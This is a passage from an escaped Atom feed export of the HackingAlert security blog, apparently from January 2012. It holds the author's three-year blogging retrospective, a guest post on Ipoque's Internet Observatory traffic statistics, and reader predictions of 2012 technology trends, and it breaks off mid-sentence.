href=&quot;http://1.bp.blogspot.com/-0XxJ9NkyVo0/Tx2qsgDgD7I/AAAAAAAABCY/sYmouEYVCz0/s1600/blog1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;177&quot; src=&quot;http://1.bp.blogspot.com/-0XxJ9NkyVo0/Tx2qsgDgD7I/AAAAAAAABCY/sYmouEYVCz0/s640/blog1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The blog traffic has grown by more than 200% in past one year and so far the blog has&amp;nbsp;received&amp;nbsp;a total of around 7 lakh hits. Soon it will hit one million. The above image shows the rapid growth in traffic for the year 2011. There were only few thousand hits in the early days, but today the blogs daily hit is double of the number of hits it got in year 2009. From past three months the blog has&amp;nbsp;received&amp;nbsp;more than 1 lakh hits per month which accounts to nearly 40% of total blog traffic.&lt;br /&gt;&lt;br /&gt;In its 3 years of operation the blog has built up a community of more than 2500 followers and 1600 subscribers. Though the figure may seem small but the increase is two fold in the recent few months.&lt;br /&gt;The blog contains more than 250 posts out of which around 50 posts appear on the top page of Google result. Visibility in search result plays a key factor in building a healthy traffic. The quality of post is always the dominant factor to result high in search queries.&lt;br /&gt;&lt;br /&gt;HackingAlert now ranks amongst top 10 blogs on computers/technology/hacking in India(Indiblogger stats).&lt;br /&gt;&lt;br /&gt;It also ranks second on Networkedblog(Biggest hub for blogs on Facebook) in the catagory of Hacking and network security.&lt;br /&gt;&lt;br /&gt;HackingAlert has also featured in some of the top Information security magazines and portals like The Hacker News, Voice of Grey hat, HACKER5, Hack9 etc.&lt;br /&gt;More than 15 different articles have been published so far.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;The success of HackingAlert also brought me lots of&amp;nbsp;appreciation. It gave me a platform to share my knowledge with others and inturn learn from others. The quest for taking blog to new heights always pushed me to keep looking for new things. This helped me to report several vulnerabilities in some of the top ranked websites. The&amp;nbsp;appreciation&amp;nbsp;of my readers helped me in publishing several papers and vulnerability submissions. Nothing best of me could have been possible without the comments and support that people showed.&lt;br /&gt;The blog not only helped me in improving my knowledge but it also helped me in improving my writing skills. This attracted one of the prominent publication house of London, PACKT publishers. They publish books related to computer science and they offered me to write a book which will be a world wide release.&lt;br /&gt;Never in my dreams had I thought that a free blog hosting will one day make me an international author.&lt;br /&gt;Well the story didnt end there, the blog also attracted some of the industry people as well. It brought me some good job offers and consultancy work. I can proudly say that HackingAlert has played a big role in helping me find a job in Worlds Number 1 security company, Symantec.&lt;br /&gt;&lt;br /&gt;It certainly sounds like a story, but its true, atleast for me. I did put in lot of effort behind my blog. At times I did feel like giving up, shutting down. But something inside me always pushed me to try harder.&lt;br /&gt;I am really thankful to all my readers for reading my posts and commenting on it. It is the comments and appriciation that has kept me going for past 3 years and I have felt that my hard work has paid now.&lt;br /&gt;Nothing best of this blog would have been possible without the support of you readers.&lt;br /&gt;&lt;br /&gt;People generally dont take blogging seriously. But it teaches you the real ethics of internet. It teaches you a part of web technology, a part of social networking, a part of search engine optimization, a part of networking, a part of technology and everything you want to blog about. It does make you a complete geek and provides you a platform where you can share your ideas and knowledge. I find blogging far more interesting than wasting time on facebook or other social networks. I wrote this blog not to make a story about myself, but to inspire people, specially my readers. I dont say that I have done something too big, but atleast I can tell the importance that web and blogging can play in ones life and how we can use it to our&amp;nbsp;benefits.&lt;br /&gt;&lt;br /&gt;Google Crome&#39;s tagline says &quot;The Web is what you make out of it&quot;. This line inspires me alot. It makes me feel that web is my own and I can use it the way I want. I chose to make my web as a blog, a place to communicate with like minded people. I want this to be the story of every individual who comes to my blog. Don&#39;t blog to just earn money out of advertisements. use it to share knowledge and you will surely get rewarded for it one day.&lt;br /&gt;&lt;br /&gt;I end this post by thanking all my readers for their support. I wish HackingAlert keeps providing you relevant information for many more years to come.&lt;br /&gt;&lt;br /&gt;-------------------- 3 years completed ------------LYNS---------------DARKLORD!!-----------------&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2593672862184553912/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/from-free-blog-hosting-to-international.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2593672862184553912'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2593672862184553912'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/from-free-blog-hosting-to-international.html' title='From free blog hosting to International Author - A journey of 3 years'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s72-c/three.jpg" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1310073012221492484</id><published>2012-01-07T02:43:00.001+05:30</published><updated>2012-01-07T02:43:56.774+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>Internet Observatory Setting New Heights with Real-Time IP Traffic Trends</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s1600/is.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s1600/is.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;Hello Friends. Here is a guest post from Adriana Jones on a very interesting topic. Special thanks to Adriana from HackingAlert for sharing this article. You can find her bio at the end of the article.&lt;/i&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It is like a watchful eye always hovering over the Internet. It is like someone keeping the Internet users on a leash. What is it actually? It is nothing but a service or a service offered by a website which has the task of monitoring global traffic 24 hours a day across various regions in the globe. It is better known as ‘Internet Observatory’ which is a venture of Ipoque, the well-known German traffic management company. The task of Internet Observatory is to offer insights into the real time IP traffic trends and bring forth the real numbers for bandwidth consumption by various applications.&lt;br /&gt;All the tracking is impressive and internet providers are going to be helped out of it. Internet Observatory has been launched as a free service monitoring Internet traffic around the globe round the clock.&lt;br /&gt;Prior to the launch of the Internet Observatory, Ipoque’s Internet Studies have been a continuous source of Internet traffic statistics since its inception back in the year 2006. Ipoque was in charge of generating yearly reports which showcased granular statistics of the Internet traffic covering eight regions of the world. Though the reports were detailed, it was found that the data were just snapshots of the Internet traffic patterns covering a certain period of time. Internet Observatory on the other hand generates real time IP traffic trends; that is live data, 24 hours a day and that too not just snapshots but real long term statistics.&lt;br /&gt;Launched at the Broadband World Forum in Paris, the statistics generated by Internet Observatory gives a real insight into the amount of traffic caused by P2P, the competition between Skype traffic and SIP trafficas well as which Instant messaging client is enjoying a steady and increased flow of traffic. A close study of the statistics generated will reveal that P2P traffic in Europe claims a huge share which stands for nearly more than a quarter of all bandwidth along with 40% of the packets sent. It has been traced that nearly all of it comes from BitTorrent whose traffic exceeds 50% during night. Even with geographic limitations, Internet Observatory is successful in generating interesting IP traffic trends which are vital for internet providers around the world.&lt;br /&gt;The Internet observatory is sort of a real entity in the world of Internet. According to Klaus Mochalski, the person behind this real time IP traffic trends monitoring project at Ipoque, Internet Observatory is set to become something which is coined as ‘Internet Seismograph’. In his words, Internet Observatory is going to be a kind of information service provider that will bring reliable data generated once per hour regarding how Internet users across the globe utilize the resources to all those who wants to know.&lt;br /&gt;Though Internet Observatory is generating real time IP traffic trends in the Europe region only, Ipoque assures that it will soon cover other regions including America, Middle East, Africa, Asia and Australia. A follow up project of Ipoque after Internet Statistics, Internet Observatory gets all the support in data collection from Ipoque’s prestigious clients and partners.&lt;br /&gt;For those who will benefit from the live IP traffic statistics including internet providers around the world, Internet Observatory is a store house of valuable information about Internet traffic. Equal interest and support from the Internet Community is also giving the project a boost. As an instance cited by those behind the project, data collected by the Internet Observatory is being contributed to an ICT statistics project which is sponsored by the European Commissions. Despite being a modular project, Internet Observatory is yet to evolve. The appreciation has given a new zeal to those behind the project to take it further and extend data coverage. All the real time IP traffic trends are being projected as line, pie or area charts taken over different time intervals.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;About the Author&lt;/u&gt;&lt;/b&gt;: &lt;i&gt;Adriana Jones is a Freelance and Staff writer who writes informative articles on &lt;a href=&quot;http://www.broadbandexpert.com/high-speed-internet/&quot; target=&quot;_blank&quot;&gt;internet providers&lt;/a&gt; in different areas. She is an expert on topics related to cables internet providers, broadband services, telecom etc.&lt;/i&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1310073012221492484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/internet-observatory-setting-new.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1310073012221492484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1310073012221492484'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/internet-observatory-setting-new.html' title='Internet Observatory Setting New Heights with Real-Time IP Traffic Trends'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s72-c/is.jpg" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8440642449543357091</id><published>2012-01-07T02:19:00.001+05:30</published><updated>2012-01-07T02:19:59.933+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>Technologies that will heat up in 2012</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;Hello Friends. Lets start the new year with the first post contributed by many readers. Its never easy to predict the flow of technology as it can be at times&amp;nbsp;turbulent&amp;nbsp;and at times mild. Still HackingAlert collected some&amp;nbsp;advice&amp;nbsp;from its readers. So here are a few technologies that can shine up in 2012.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Tablets&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s1600/tab.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s200/tab.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Undoubtedly tablets will outshine smart phones in 2012. With the dominance of ipad2 and samsung galaxy, the market will surely heat up with new players like HTC, Blackberry. In 2011 tablet sales contributed to 12% of PC market. More than 2% of internet population has shifted to tablets. These stats are sure to double this year in 2012. The year is certainly going to be a tablet boom with much awaited products lined up like ipad3, ice-cream sandwitch tablets etc. Alone in India, the launch of world&#39;s cheapest tablet Akash has recieved even more demand than ipad. So far 1.5 million Akash devices have been booked online.&lt;br /&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology:&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-KxK3BybGZms/TwdOLjMeMYI/AAAAAAAABA0/bnkXD6bu06c/s1600/cont1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-KxK3BybGZms/TwdOLjMeMYI/AAAAAAAABA0/bnkXD6bu06c/s1600/cont1.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Semantic Web&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-G0X3Kfc5ZPU/TwdP4dvMTYI/AAAAAAAABA8/sz81is4y-DM/s1600/semantic.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-G0X3Kfc5ZPU/TwdP4dvMTYI/AAAAAAAABA8/sz81is4y-DM/s1600/semantic.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Semantic web means a web of data that allow machines to understand that meaning of data or information written over the World Wide Web. In the existing webs various tasks like searching for a book, downloading a movie, searching for the lowest available prices etc. are performed by human interventions because webs are designed to be read by human not by machines. But in semantic webs information can be interpreted by machines and such type of task can be accomplished without human interventions. &amp;nbsp;If &amp;nbsp;User want to search something over the internet, search engine will display all the content whether relevant or irrelevant for user. User have to find again relevant data whereas, in semantic technologies computer reads the word or phrase searched a user using search engine and produce the specific relevant result by the means of artificial intelligence techniques. In the web 3.0 there will be no need for you to be a programmer before editing the site,the user of the site will also be a modifier and editor.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors For this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-SmFAD31pEy4/TwdP5_7WYFI/AAAAAAAABBE/cp9IcBhDOoM/s1600/cont2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-SmFAD31pEy4/TwdP5_7WYFI/AAAAAAAABBE/cp9IcBhDOoM/s1600/cont2.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;NFC &amp;amp; M-Commerce&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-yUrXCYcycGU/TwdSVeb7_tI/AAAAAAAABBM/RJVn-UZJfY0/s1600/nfc.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;187&quot; src=&quot;http://2.bp.blogspot.com/-yUrXCYcycGU/TwdSVeb7_tI/AAAAAAAABBM/RJVn-UZJfY0/s200/nfc.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Well The two technologies are different but they are almost inter-related.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Imagine tapping your phone to a receiver at a register, and instantly paying for an item without fumbling for your wallet. Or getting into a movie theater with a similar tap of your phone. Or being able to load your transit card onto your phone, using a simple tap to deduct money for every trip on the subway.&lt;br /&gt;All of that is already possible with the help of near-field communication chips, which transfer small amounts of data through a short-range, low-friction connection.&lt;br /&gt;Currently, you can buy the Google Nexus S phone, which carries an NFC chip and the Google Wallet companion app for syncing your credit cards to your phone and making mobile payments at participating vendors. Meanwhile, RIM is baking NFC chips into newer phones such as the BlackBerry 9900, and recently it introduced Tag, a RIM-specific feature that allows BlackBerry users to transfer contact information and documents. Growth in NFC enabled devices will surely bring a boom in M-Commerce.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-VwMQsCpt9h8/TwdSXCeC9II/AAAAAAAABBU/AIClKeZspUE/s1600/cont3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-VwMQsCpt9h8/TwdSXCeC9II/AAAAAAAABBU/AIClKeZspUE/s1600/cont3.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Human Sensing Commands&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-Sdi3NM-ThBc/TwdUvf6EwxI/AAAAAAAABBc/kLSXfsHh_Kk/s1600/siri.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-Sdi3NM-ThBc/TwdUvf6EwxI/AAAAAAAABBc/kLSXfsHh_Kk/s200/siri.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Well NO one reported about this technology but I believe that human sensing commands like Voice commands and touch commands will be the main focus in 2012. Lets talk a bit in detail. Siri has already shocked the world with its unique way of sensing human voices. Similarly Android is rolling out its face recognization phone unlock tecjnology in Android 4.0 enabled smart phones and tablets. But my pick of the year will be Windows 8. Obviously Microsoft is taking a very bold and ambitious move by single handedly tackling the PC market by launching a completely touch based operating system. Its tough to predict the success of Windows 8 but I certainly believe that microsoft will have a upper hand in it. The excellence of Windows will surely impress the users and force them to shift from mouse and keyboard to Touch screens.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;On Demand TV content / Internet TV&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-PWrIZLvfJbA/TwdXCWVnmzI/AAAAAAAABBk/427PY8wdnRw/s1600/tv.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-PWrIZLvfJbA/TwdXCWVnmzI/AAAAAAAABBk/427PY8wdnRw/s1600/tv.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Internet is everywhere now. We are connected and surrounded by it. TV is the next big platform where the world wide web is searching for possibilities and year 2012 is going to be cruicial for it. Though internet and on demand TV have been in market for quiet some time but they have not reached the masses. It is yet to catch attention. But what special will happen in 2012? Apple TV is the answer. Apple is the&amp;nbsp;&lt;/span&gt;pioneer&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;for several technologies and with the entry of Apple in this segment, you can surely bet your money on it. Players like Google, Logitech are already in market but the success rate is still slow. The shift of apps on TV will surely provide a new taste to tech savy people.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-0gwZNavN2Ys/TwdXDTXPfcI/AAAAAAAABBs/kV6QXJF3f40/s1600/cont4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-0gwZNavN2Ys/TwdXDTXPfcI/AAAAAAAABBs/kV6QXJF3f40/s1600/cont4.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;Dual Core Mobile Processors&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-SKeUIXV8Lhk/TwdaMjxMT7I/AAAAAAAABB0/RBm05HxE05o/s1600/dual.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://1.bp.blogspot.com/-SKeUIXV8Lhk/TwdaMjxMT7I/AAAAAAAABB0/RBm05HxE05o/s200/dual.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In 2011, the Motorola Atrix and the Droid Bionic were the first commercially popular smartphones to sport dual-core processors. In the fall, Apple’s iPhone 4S followed suit--and now it seems unlikely that any smartphones unveiled in 2012 will be competitive unless they can offer the same processing power that Apple’s phones do.&lt;br /&gt;As a result, you should expect to see a surge in dual-core mobile devices. ARM executive James Bruce, whose company licenses the designs of chips that find their way into almost every mobile device in the world, said in a May interview that dual-core processors would be a huge part of making smartphones not just powerful but also battery-efficient.“If you look at handsets today, we’ve seen dual-core handsets reduce power consumption,” he says. For example, if you&#39;re sending a text message, dual-cores have the potential to effectively streamline the lower-power functions of the phone through one core, while reserving the other core for more power-intensive functions, like gaming or navigation.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Contributors of this technology&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-HRqZnnpmDGU/TwdaNnuuBlI/AAAAAAAABB8/_dY-kQsqrqc/s1600/cont5.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;98&quot; src=&quot;http://3.bp.blogspot.com/-HRqZnnpmDGU/TwdaNnuuBlI/AAAAAAAABB8/_dY-kQsqrqc/s320/cont5.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;Hyper Hybrid Cloud&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This technology is currently the new taste of startups. We have seen a tremendous growth in cloud technology in past 3 years. This year can be somthing new. There are 